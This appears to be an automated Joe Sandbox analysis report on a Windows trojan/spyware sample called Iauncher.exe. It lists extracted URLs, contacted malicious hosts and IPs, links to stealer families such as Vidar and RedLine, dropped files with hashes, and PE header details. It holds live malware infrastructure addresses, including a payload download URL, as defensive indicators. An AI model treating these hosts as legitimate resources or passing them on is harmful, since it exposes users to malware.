http://tempuri.org/D	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/06/addressingex	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id13Response	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txtt-	Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://antiloxss.usite.pro	Iauncher.exe, 00000000.00000002.3509420380.00000000029D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.siticoneframework.com/pricing.htmlFSoftware	Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://antiloxss.usite.prod	Iauncher.exe, 00000000.00000002.3509420380.00000000029D2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2002/12/policy	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id22Response	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id18Response	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
147.45.47.65	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
104.21.44.179	gitgo.org	United States	13335	CLOUDFLARENETUS	false
193.109.246.100	antiloxss.usite.pro	Virgin Islands (BRITISH)	204343	COMPUBYTE-ASRU	false
142.251.163.113	google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1434866
Start date and time:	2024-05-01 20:45:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Iauncher.exe
Detection:	MAL
Classification:	mal96.troj.spyw.evad.winEXE@6/7@3/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 187 Number of non-executed functions: 54
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Iauncher.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.109.246.100	Undetections.exe	Get hash	malicious	Vidar	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COMPUBYTE-ASRU	Undetections.exe	Get hash	malicious	Vidar	Browse	193.109.246.100
	T4IoJqcAwY.exe	Get hash	malicious	Nymaim, SmokeLoader, Zealer Stealer, onlyLogger	Browse	193.109.246.62
	https://www.minstroy.saratov.gov.ru/communication/blog/admin-blg/1.php?pagen=12	Get hash	malicious	Unknown	Browse	193.109.247.233
	njw.exe	Get hash	malicious	Unknown	Browse	193.109.247.229
CLOUDFLARENETUS	tZvjMg3Hw9.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	172.67.151.19
	Sean Eichler.htm	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.16.103.112
	[V2]launcher.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse	104.21.73.118
	https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://2625819278.org/MIg2p2	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://2625819278.org/MIg2p2	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcff	Get hash	malicious	Remcos	Browse	172.66.0.163
	https://2625819278.org/MIg2p2	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
FREE-NET-ASFREEnetEU	tZvjMg3Hw9.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	193.233.132.226
	2zdult23rz.exe	Get hash	malicious	RisePro Stealer	Browse	147.45.47.93
	file.exe	Get hash	malicious	RisePro Stealer	Browse	147.45.47.93
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	193.233.132.175
	fBirvIlaOJ.exe	Get hash	malicious	RedLine	Browse	147.45.47.36
	VOrqSh1Fts.exe	Get hash	malicious	Neoreklami, PureLog Stealer	Browse	193.233.132.234
	WlCIinu0yp.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRAT	Browse	147.45.47.93
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	193.233.132.47
	file.exe	Get hash	malicious	LummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	147.45.47.93

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Luminar_v4.0.1.hta	Get hash	malicious	Cobalt Strike, Atlantida Stealer	Browse	104.21.44.179 193.109.246.100
	[V2]launcher.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse	104.21.44.179 193.109.246.100
	Hola-Browser-Setup-C-Mmd1.exe	Get hash	malicious	PureLog Stealer, SilentXMRMiner, Xmrig	Browse	104.21.44.179 193.109.246.100
	0ED4nPDjeo.exe	Get hash	malicious	RedLine, SectopRAT	Browse	104.21.44.179 193.109.246.100
	Dy4Oz8C1yF.exe	Get hash	malicious	Quasar	Browse	104.21.44.179 193.109.246.100
	KG8KxoD6n4.exe	Get hash	malicious	Quasar	Browse	104.21.44.179 193.109.246.100
	twkBksZzkc.exe	Get hash	malicious	Quasar	Browse	104.21.44.179 193.109.246.100
	Agreement.docx	Get hash	malicious	Unknown	Browse	104.21.44.179 193.109.246.100
	uF8wwjO0iU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.44.179 193.109.246.100

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:28 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.456324608366694
Encrypted:	false
SSDEEP:	48:8SkudZTBnGRYrnvPdAKRkdAGdAKRFdAKR/U:8SvZ
MD5:	76FE8DA04758158775318A14A428F45E
SHA1:	4FD7FF194FBE1EA13EAAA3C84B89417C752CA6FC
SHA-256:	1B4FF0DCAC573DB025FE338BE53B8DF0BB5A72534269698C22DC48600C7D7C4A
SHA-512:	C65FF550B8DC8C2E63239388DDD842501EB104EB0117E9894FDEB6A99C9567078E220FFF7A72EE09B086C30AA9FEDA2155ABF6EF9A07570D34A3358D42B031A7
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ......,...............q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.V..PROGRA~1..t......O.IDW5`....B...............J.....i...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWO`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWO`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWO`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDWI`..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
MD5:	0B2E58EF6402AD69025B36C36D16B67F
SHA1:	5ECC642327EF5E6A54B7918A4BD7B46A512BF926
SHA-256:	4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
SHA-512:	1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\Tmp50A6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp50E6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Download File

Process:	C:\Users\user\Desktop\Iauncher.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	505344
Entropy (8bit):	7.675139785236683
Encrypted:	false
SSDEEP:	12288:L4J4ZH65jJTA3St/9q8OH0UXHyo1wLnWXT23i5gk5EDuSXRa:E4ZGTtt/Y8cfh1wLn4T23i52B
MD5:	D79977A15EB010C637CF9078B4EB82C8
SHA1:	AE5672620C42C4BA2C2B8BD5B8FB3AD519C252B1
SHA-256:	3F5012D3CFFBD993BFEFEAFC606D343BDC2A2E74B3A01A7DA4F3D31F601FB5DD
SHA-512:	D120A994969376884822DC3C4A1E333F6E99A4367FF95BDCCE726BBAF60E68C055656D553A69D6A9FB59825B7AFA9732AF56E5C43C99A7951895F60C0B607199
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.LBw.".w.".w."...!.{."...'..."...&.b."...#.t.".w.#..."..N&.e."..N!.c."..N'.:."..M'.v."..M..v."..M .v.".Richw.".........PE..L....v*f...............'. ...........e.......@....@.......................................@.....................................(...................................................................X...@............@..8............................text...\|........................... ..`.bss.........0...................... ..`.rdata.......@.......$..............@..@.data...T...........................@....bsS................................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Iauncher.zip

Download File

Process:	C:\Users\user\Desktop\Iauncher.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	418397
Entropy (8bit):	7.999431817473085
Encrypted:	true
SSDEEP:	12288:vxSs1o7rStD9+8Oz0QXHyo1wLzWXTeJibgk5EDlPIMi:pftDw8Whh1wLz4TeJibiPIMi
MD5:	B8C12D614B71C08CE95A396873943237
SHA1:	773D0890D34B2C2420F7CF4009C03D5041D67DC2
SHA-256:	90FA59DD99A23C733F6E2274A3B64D5DB70A15FD9C5BF3B68AE3EFA984B5D311
SHA-512:	FF07BFF6326131AFBBBA4F71463FEEC6FC38D30C7A987D72A1CC648901CCEBF788FF3B01C92680FE9C14C7C433419AF270B3A78346167A864A35792902DDEA2C
Malicious:	false
Preview:	PK...........X{..[.a..........Iauncher.exe..}\|T..8...I.d.]`..Q"...5....p..$Z..bv.......p/.J x....m................< .o.6X..7jx0.@...3ww.`P.y...?.?4{.93s...s..).a3g.8..?].m....}..(.....8.1o.....s......+......}.....)....+.;..\|g........dd.u..p..EEkv..........e..l.......s.Mb03._.....o[...na..lW......j..h...f.K~\|K=......E.4.m.Eu.n.lJ7....6s.),....cC....x..T.;..8. "..p.M..a....{.=37._..q.&....-S9..53.....W.....g.....i.Z....2..M5'.......y.\|...rc.>..M....P.!....~.O.p........l.[..o.....\|.p;.(..s.(p+W....2.4.6..K.f.+..~.-..%...W.+.........=s8.~.......n\|...W.;.._.I_..c......a.k1....S......c..Y...ct+....&.y.^.D .GvS.<.#.;R0.Ao...{.Z.=.\|\|.z.y...$c!..ecp}.d.^>....?j.l............p%....^_..W.....d... ..f..[xN......ikm...p.<...3.".]-.$....U..Z._\|ow[9...HxY...%..)...L.k...X.<..+./EFT...$x.......Jg.:....q.t'..`.4V+..tw..C..~.q......r..W.B]..j2.+..k%.yY..............Z....j[..S? .l...9\d.._....5.....i%$E.Y$.V..j...v:...j.s.5.......P.(p.(..@..x

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.894923776387099
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Iauncher.exe
File size:	732'672 bytes
MD5:	e69feb7fd40f408a088d879be323f37a
SHA1:	0f71fa75df6795c43c69e7ec5689c995c135079e
SHA256:	463dd34a95d86ca5d08059f1ec80d3b00d3bbabdc74936025b7e30ef2b3ee931
SHA512:	6840d2b2e00c47d83298833a99309c22028499fa9f0022ea76f9a91bc73a33e414d2168e941bebbf1191229d2f0f6397dc645dc087f7fdd4c4996a82a733b252
SSDEEP:	12288:klkQRVR3DXMZ6GQ6ov2m+UtbVkGDvAd1si+tS:kdVR3bQUv2gVbAdtu
TLSH:	06F41268C3A84E3AE3A903FCA8720546E7755A167166F70FBE8A70F5001476EE6053DF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6............."...0.................. ... ....@.. ....................................`................................

File Icon


Icon Hash:	60959501a1964333

Static PE Info

General

Entrypoint:	0x4b1dbe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xACDA9736 [Wed Nov 23 21:25:10 2061 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
